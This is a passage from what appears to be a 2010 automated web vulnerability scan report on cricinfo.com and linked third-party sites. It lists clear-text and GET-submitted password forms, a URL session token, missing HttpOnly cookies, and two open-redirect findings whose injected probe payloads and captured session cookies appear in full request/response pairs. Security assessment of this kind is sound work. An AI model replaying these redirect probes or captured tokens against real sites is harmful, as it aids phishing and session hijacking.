Host: www.cricinfo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2171362-12c24636d70-46e75e48-2; VWCUKP300cricinfo=L0/Q52175_9650_5_110610_2_123110_305086x300231x110610x2x2/Q59823_11018_5_110610_1_123110_377616x375442x110610x1x1/Q54302_9880_5_110610_3_123110_346488x337926x110610x3x3/Q54305_9880_5_110510_1_123110_346490x338006x110610x1x1; SVWCUKP300cricinfo=305086_2/346488_3/346490_1/377616_1; s_pers=%20s_c24%3D1289100691322%7C1383708691322%3B%20s_c24_s%3DFirst%2520Visit%7C1289102491322%3B%20s_gpv_pn%3Dcricinfo%253Aglobal%253Anews%253Aespn%2520acquires%2520cricinfo%7C1289102491337%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=15
Content-Type: text/html; charset=UTF-8
X-Varnish: 718367964 718366712
X-Varnish-Cache: HIT
X-Varnish-Hits: 1
X-Varnish: 903951072
Vary: Accept-Encoding
Date: Sun, 07 Nov 2010 06:09:51 GMT
Connection: close
Content-Length: 130851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-07 06:09:47
...[SNIP]...
</div>
<form onSubmit="return ciLoginvalidate();" method="post" name="ciloginfm" id="ciloginfm" style="margin:0px; margin-top:4px; padding:0px;">
<ul id="cilogintxt" style="margin:0px;padding:0px">
...[SNIP]...
<li><input name="password" id="password" class="citextbox" type="password"></li>
...[SNIP]...

6.6. http://www.cricinfo.com/magazine/content/current/story/magazine/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /magazine/content/current/story/magazine/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magazine/content/current/story/magazine/index.html HTTP/1.1
Host: www.cricinfo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2171362-12c24636d70-46e75e48-2; VWCUKP300cricinfo=L0/Q52175_9650_5_110610_2_123110_305086x300231x110610x2x2/Q59823_11018_5_110610_1_123110_377616x375442x110610x1x1/Q54302_9880_5_110610_3_123110_346488x337926x110610x3x3/Q54305_9880_5_110510_1_123110_346490x338006x110610x1x1; SVWCUKP300cricinfo=305086_2/346488_3/346490_1/377616_1; s_pers=%20s_c24%3D1289110194249%7C1383718194249%3B%20s_c24_s%3DLess%2520than%25201%2520day%7C1289111994249%3B%20s_gpv_pn%3Dcricinfo%253Aglobal%253Acountry%2520index%7C1289111994268%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 718369844 718308435
X-Varnish-Cache: HIT
X-Varnish-Hits: 4
X-Varnish: 903953394
Vary: Accept-Encoding
Date: Sun, 07 Nov 2010 06:09:58 GMT
Connection: close
Content-Length: 109767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-07 06:06:24
...[SNIP]...
</div>
<form onSubmit="return ciLoginvalidate();" method="post" name="ciloginfm" id="ciloginfm" style="margin:0px; margin-top:4px; padding:0px;">
<ul id="cilogintxt" style="margin:0px;padding:0px">
...[SNIP]...
<li><input name="password" id="password" class="citextbox" type="password"></li>
...[SNIP]...

7. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?access_token=false&api_key=260890547115&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3a628032%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df2891719cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df23a3d00cc%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2891719cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df110c2bea%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2891719cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1206ce238%26origin%3Dhttp%253A%252F%252Fwww.cricinfo.com%252Ff15636553%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2891719cc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cricinfo.com/ci/content/page/417881.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; locale=en_US

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f110c2bea&origin=http%3A%2F%2Fwww.cricinfo.com%2Ff15636553&relation=parent&transport=postmessage&frame=f2891719cc
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 07 Nov 2010 06:09:49 GMT
Content-Length: 0


8. Password field submitted using GET method  previous  next
There are 4 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://espn.go.com/espn3/index  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espn.go.com
Path:   /espn3/index

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /espn3/index HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 05:45:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 05:37:57 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN05
Cache-Expires: Sun, 07 Nov 2010 05:46:35 GMT
Content-Length: 772933
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
</script>
<form style="display:none"><input type="text" id="hiddenUsername" name="username"/><input type="password" id="hiddenPassword" name="password"/></form>
...[SNIP]...

8.2. http://espn.go.com/espn3/index/_/sport/basketball  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/basketball

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /espn3/index/_/sport/basketball HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 05:46:08 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 05:21:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sun, 07 Nov 2010 05:29:56 GMT
Content-Length: 152684
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
</script>
<form style="display:none"><input type="text" id="hiddenUsername" name="username"/><input type="password" id="hiddenPassword" name="password"/></form>
...[SNIP]...

8.3. http://espn.go.com/espn3/index/_/sport/football  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/football

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /espn3/index/_/sport/football HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 05:46:30 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 05:40:33 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sun, 07 Nov 2010 05:49:11 GMT
Content-Length: 320269
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
</script>
<form style="display:none"><input type="text" id="hiddenUsername" name="username"/><input type="password" id="hiddenPassword" name="password"/></form>
...[SNIP]...

8.4. http://espn.go.com/espn3/index/_/sport/index  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espn.go.com
Path:   /espn3/index/_/sport/index

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /espn3/index/_/sport/index HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 05:46:30 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 17:51:37 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 17:59:57 GMT
Content-Length: 787554
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta http
...[SNIP]...
</script>
<form style="display:none"><input type="text" id="hiddenUsername" name="username"/><input type="password" id="hiddenPassword" name="password"/></form>
...[SNIP]...

9. Open redirection  previous  next
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


9.1. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.track.decideinteractive.com
Path:   /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The value of REST URL parameter 4 is used to perform an HTTP redirect. The payload http%3a//af9e139593981cda3/a%3fwww.247realmedia.com was submitted in the REST URL parameter 4. This caused a redirection to the following URL:

Request

GET /n/13465/13553/http%3a//af9e139593981cda3/a%3fwww.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 07 Nov 2010 05:43:12 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sun, 07 Nov 2010 05:43:12 GMT
location: http://af9e139593981cda3/a?www.247realmedia.com
Set-Cookie: id=9272912479250284567; expires=Mon, 07-Nov-2011 05:43:12 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912479250284574; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


9.2. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://au.track.decideinteractive.com
Path:   /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a606aae5ae1d24768/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c?.a606aae5ae1d24768/=1 HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 07 Nov 2010 05:42:57 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sun, 07 Nov 2010 05:42:57 GMT
location: http://www.247realmedia.com?.a606aae5ae1d24768/=1
Set-Cookie: id=9272912479099290684; expires=Mon, 07-Nov-2011 05:42:57 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912479099291029; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


10. Cookie without HttpOnly flag set  previous  next
There are 18 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://www.cricshop.com/Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cricshop.com
Path:   /Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Replica-Cricket-Kit/2009%20England%20Replica%20Clothing.aspx HTTP/1.1
Host: www.cricshop.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 07 Nov 2010 06:09:34 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2rduw455etrcgrq5htk3lqax; path=/; HttpOnly
Set-Cookie: sb2_session=d923b171-0dc6-4b7f-8351-151933765c76; expires=Tue, 07-Dec-2010 06:09:34 GMT; path=/
Vary: Accept-Encoding
Content-Length: 24214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
...[SNIP]...

10.2. http://www.hsbcnri.co.in/lms0509/HSBCNACC17Aug09/lp.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hsbcnri.co.in
Path:   /lms0509/HSBCNACC17Aug09/lp.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lms0509/HSBCNACC17Aug09/lp.asp?website=Cricinfo&ads=0809PoaUS_C4CrInfo&adssize=text HTTP/1.1
Host: www.hsbcnri.co.in
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sun, 07 Nov 2010 06:10:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: lpUs.asp?website=Cricinfo&ads=0809PoaUS_C4CrInfo&adssize=text
Content-Length: 190
Content-Type: text/html
Expires: Sat, 06 Nov 2010 18:30:00 GMT
Set-Cookie: ASPSESSIONIDSCAAAQSC=HCIEBDPCKJKFFEGDJDKJCGHP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="lpUs.asp?website=Cricinfo&amp;ads=0809PoaUS_C4CrInfo&amp;adssize=text">here</a>.</body>

10.3. http://www.icicibankm2i.com/lms_ct/m2iGLSCH/index.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.icicibankm2i.com
Path:   /lms_ct/m2iGLSCH/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lms_ct/m2iGLSCH/index.asp?UserType=cricinfo_na_text_cpm HTTP/1.1
Host: www.icicibankm2i.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 06:10:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 10168
Content-Type: text/html
Expires: Sat, 06 Nov 2010 18:30:00 GMT
Set-Cookie: USER=USERTYPE=cricinfo%5Fna%5Ftext%5Fcpm&USERURL=UserType%3Dcricinfo%5Fna%5Ftext%5Fcpm; path=/
Set-Cookie: ASPSESSIONIDSCAAAQSC=GCIEBDPCNHDMKBPMLMIMHHCD; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

10.4. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

